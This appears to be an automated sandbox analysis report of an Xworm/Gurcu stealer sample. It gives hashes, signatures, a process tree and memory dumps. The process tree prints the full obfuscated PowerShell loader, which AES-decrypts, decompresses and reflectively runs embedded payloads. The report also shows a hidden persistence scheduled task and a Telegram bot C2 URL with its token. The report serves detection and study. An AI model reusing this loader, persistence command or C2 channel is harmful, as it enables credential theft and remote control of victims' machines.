Analysis

  • max time kernel
    297s
  • max time network
    299s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-09-2024 13:31

General

  • Target

    telegram malware.bat.vbs

  • Size

    47KB

  • MD5

    2d4b3f85f3619e096e14096a0849fbf9

  • SHA1

    c9aa9a3f00830625ff3f806d0b0d6a22ac3a7d93

  • SHA256

    49a7db4ab12330edff1ef80c5e0c9c93d69c4fe36e4ae25eb92d311be55baf66

  • SHA512

    42f220a2dee917c3c14164a4fe2399e196218fcea7bc5d56afee6c08ac0bf88b765a9e5bda1cff5f17d59d85800575ceba26819116ca33829a27abed2b53c4aa

  • SSDEEP

    768:0yWnyN9IbUZIYiztjyHg6QihA1WmmaMj17Hln1nVrV:0E9XqYwtWAb1DmdxLln5

Malware Config

Extracted

Family

xworm

Version

5.0

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7533145045:AAGnW8Bkr0_G1f_ZxiKTve5hlRZjphTc0aM/sendMessage?chat_id=-4512836800

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\telegram malware.bat.vbs"
    1⤵
      PID:1680
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4952
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:2980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\telegram malware.bat" "
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3740
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\Admin\AppData\Local\Temp\telegram malware.bat';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
          2⤵
            PID:4208
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
            2⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4432
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2024
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\telegram malware')
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3864
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4576
        • C:\Windows\System32\NOTEPAD.EXE
          "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\SC.cmd
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:344
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SC.cmd" "
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:2284
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\Admin\AppData\Roaming\SC.cmd';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
            2⤵
              PID:2760
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              2⤵
              • Blocklisted process makes network request
              • Suspicious use of WriteProcessMemory
              PID:2948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                3⤵
                • Command and Scripting Interpreter: PowerShell
                PID:1900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC')
                3⤵
                  PID:4988
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3524
            • C:\Windows\System32\SppExtComObj.Exe
              "C:\Windows\System32\SppExtComObj.Exe"
              1⤵
                PID:1884
              • C:\Windows\System32\SppExtComObj.Exe
                "C:\Windows\System32\SppExtComObj.Exe"
                1⤵
                  PID:560
                • C:\Windows\System32\SppExtComObj.Exe
                  "C:\Windows\System32\SppExtComObj.Exe"
                  1⤵
                    PID:1816
                  • C:\Windows\System32\Spectrum.exe
                    "C:\Windows\System32\Spectrum.exe"
                    1⤵
                      PID:4932

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      3KB

                      MD5

                      3f01549ee3e4c18244797530b588dad9

                      SHA1

                      3e87863fc06995fe4b741357c68931221d6cc0b9

                      SHA256

                      36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                      SHA512

                      73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Filesize

                      53KB

                      MD5

                      a26df49623eff12a70a93f649776dab7

                      SHA1

                      efb53bd0df3ac34bd119adf8788127ad57e53803

                      SHA256

                      4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                      SHA512

                      e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                      Filesize

                      2KB

                      MD5

                      e4de99c1795fd54aa87da05fa39c199c

                      SHA1

                      dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

                      SHA256

                      23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

                      SHA512

                      796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      cc2ce575753731574bf10ff6e5162032

                      SHA1

                      b660e5156f97af770e5d359fdd2a6ea697f359fb

                      SHA256

                      c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa

                      SHA512

                      715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      97748f71ed95026706014e8524266292

                      SHA1

                      f60663ea2e2a778c57d07d9678fe04c79c3ff942

                      SHA256

                      f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f

                      SHA512

                      b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      11b2ddac5f77354fdf267769650c46f4

                      SHA1

                      4b4fb743eefb36191871d8bd3dc374caed41a9db

                      SHA256

                      b61a60bf71fdae451a7be222d041d153262224d241c0803e0f7bb289013ac134

                      SHA512

                      72372c52617151d65d97363770b128c8a0180e4713ec98f992c2f802c4781fcd6ab4dc6153b256254870aae63e30d453fb61489c1f2f9f912d5efd1bb97bc2ae

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0waypmk4.lup.ps1

                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Roaming\SC.cmd

                      Filesize

                      47KB

                      MD5

                      2d4b3f85f3619e096e14096a0849fbf9

                      SHA1

                      c9aa9a3f00830625ff3f806d0b0d6a22ac3a7d93

                      SHA256

                      49a7db4ab12330edff1ef80c5e0c9c93d69c4fe36e4ae25eb92d311be55baf66

                      SHA512

                      42f220a2dee917c3c14164a4fe2399e196218fcea7bc5d56afee6c08ac0bf88b765a9e5bda1cff5f17d59d85800575ceba26819116ca33829a27abed2b53c4aa

                    • memory/4432-23-0x0000021D32F70000-0x0000021D32FB4000-memory.dmp

                      Filesize

                      272KB

                    • memory/4432-37-0x0000021D32F40000-0x0000021D32F48000-memory.dmp

                      Filesize

                      32KB

                    • memory/4432-13-0x0000021D32DF0000-0x0000021D32E12000-memory.dmp

                      Filesize

                      136KB

                    • memory/4432-62-0x0000021D334F0000-0x0000021D334FE000-memory.dmp

                      Filesize

                      56KB

                    • memory/4432-38-0x0000021D32F50000-0x0000021D32F5E000-memory.dmp

                      Filesize

                      56KB

                    • memory/4432-24-0x0000021D333A0000-0x0000021D33416000-memory.dmp

                      Filesize

                      472KB

                    • memory/4432-36-0x0000021D32DD0000-0x0000021D32DD8000-memory.dmp

                      Filesize

                      32KB

                    • memory/4952-9-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-1-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-7-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-10-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-8-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-11-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-12-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-6-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-2-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB

                    • memory/4952-0-0x0000021E38320000-0x0000021E38321000-memory.dmp

                      Filesize

                      4KB